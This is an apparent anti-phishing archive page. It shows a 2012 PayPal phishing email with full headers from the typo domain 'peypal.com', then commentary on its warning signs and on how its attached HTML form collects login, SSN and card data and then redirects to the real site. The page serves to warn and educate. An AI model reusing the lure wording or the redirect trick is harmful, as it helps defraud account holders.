Your Account Has Been Limited PayPal Case ID PP-658-119-347
[Previous Example] [Share This Page] [Back To The Main SHPAMEE Index] [Next Example]
VERY IMPORTANT INFORMATION, READ THIS FIRST: The example and associated information published on this page are subject to the SHPAMEE Terms Of Use. Please familiarise yourself with these terms before viewing or using any information on this page.
Header:
X-Account-Key: account6
X-UIDL: x
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Delivered-To: x
Received: by 10.58.56.135 with SMTP id a7csp532149veq;
Wed, 17 Oct 2012 14:00:19 -0700 (PDT)
Received: by 10.50.153.229 with SMTP id vj5mr2885442igb.50.1350507618604;
Wed, 17 Oct 2012 14:00:18 -0700 (PDT)
Return-Path: <service@peypal.com>
Received: from vps.citysoftech.com ([67.202.92.45])
by mx.google.com with ESMTPS id ak4si22864359icc.58.2012.10.17.14.00.17
(version=TLSv1/SSLv3 cipher=OTHER);
Wed, 17 Oct 2012 14:00:18 -0700 (PDT)
Received-SPF: neutral (google.com: 67.202.92.45 is neither permitted nor denied by best guess record for domain of
service@peypal.com) client-ip=67.202.92.45;
Authentication-Results: mx.google.com; spf=neutral (google.com: 67.202.92.45 is neither permitted nor denied by best
guess record for domain of service@peypal.com) smtp.mail=service@peypal.com
Message-Id: <x@mx.google.com>
Received: from [85.17.249.195] (helo=User)
by vps.citysoftech.com with esmtpa (Exim 4.69)
(envelope-from <service@peypal.com>)
id 1TOaqG-0000R6-F4; Wed, 17 Oct 2012 16:07:59 -0500
From: "service@x"<service@peypal.com>
To: x
Subject: Your Account Has Been Limited PayPal Case ID PP-658-119-347
Date: Wed, 17 Oct 2012 20:57:27 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_00B6_01C2A9A6.6DA7801E"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - vps.citysoftech.com
X-AntiAbuse: Original Domain - cybertopcops.com
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - peypal.com
X-Source:
X-Source-Args:
X-Source-Dir:
Body:
| |||||
|
Please complete the attached form to verify your Profile information and restore your account access. |
|
|
| Personal Information Profile |
Make sure you enter the information accurately, and according to the formats required. Fill in all the required fields. |
Dear customer , |
As part of our efforts to provide a safe and secure environment for the online
community, we regularly screen account activity. Our review of your account has identified an issue
regarding its safe use. We have placed a restriction on your account as a precaution. |
To lift the restriction we will require some further information from you. |
If, once we review your further information and we're confident that the
use of your account does not present a safety risk to our service and
customers, we'll be happy to reinstate your account. |
We have sent you an attachment which contains all the necessary steps in order to restore your account access.
Download and open it in your browser.
After we have gathered the necessary information, you will regain full access to your account.
|
We thank you for your prompt attention to this matter. |
|
|
Very sincerely, |
Comments:
Related Cyber Criminal Profiles:
No related profiles found.Similar Spam Examples:
Paypal Phishing Scam - Attention! Your PayPal Account Could Be Suspended!Amazon Phishing Scam - Update Your Account
PayPal Phishing Scam - Resolution Center - Account Issues
IRS Phishing Scam - IRS: Important information
IRS Phishing Scam - For the attention of business owners
Related Malware Samples:
No related malware samples found.[Previous Example] [Share This Page] [Back To The Main SHPAMEE Index] [Next Example]
Personal Information Profile
Make sure you enter the information accurately, and according to the formats required.
Fill in all the required fields.
Dear customer
First they tell you what to do and THEN they greet you, with one of those generic "Dear customer" greetings. This should already tell you that you are not really dealing with an e-mail from PayPal. As a matter of fact if you paid any attention to the from address you should have noticed the typo in service@peypal.com. That gives the scam away immediately.
We still have trouble understanding how to download an attachment already attached to an e-mail, that has already been downloaded. Once you open the attachment, a web page will load in your browser, that looks exactly like the official PayPal website. You should notice that the address in the address bar does not point to paypal.com, but actually to a file on your computer's hard drive. Yes all the information you enter on this "web page" are collected on your computer and sent to a remote phishing site.
The first page of the phishing form looks like this:
Did you notice that the password is not masked? This is another sign that you are not entering the information on the real PayPal website.
The second page collects the following information:
Once again, a lot of personal information. The social security number is not validated in any way, so you can enter absolutely any rubbish in these fields.
The last page collects the following information:
We entered a random bunch of numbers and it became clear that the page only does some basic validation and does not really verify that the credit card number is valid. This is why it takes less than 30 seconds (because the form only collects data, it does not validate anything. Secondly, the form is hosted locally on your computer, so it is supposed to be fast).
The form submits the data to a remote website, either hacked or owned by the phishing scammers, then it redirects to the official PayPal website and since the scammers only collected your information, you should be able to log in as normal, just like the e-mail said. This is a very clever move by the scammers because the victim will continue using PayPal without suspecting a thing.
Phishing scammers are moving away from the old fashioned phishing method of including a link to the phishing site. Most phishing scams these days, involve some HTML attachment that has to be opened. Remember PayPal will never send you an e-mail requesting any form of personal information nor will they send you an e-mail with some HTML form attached to it.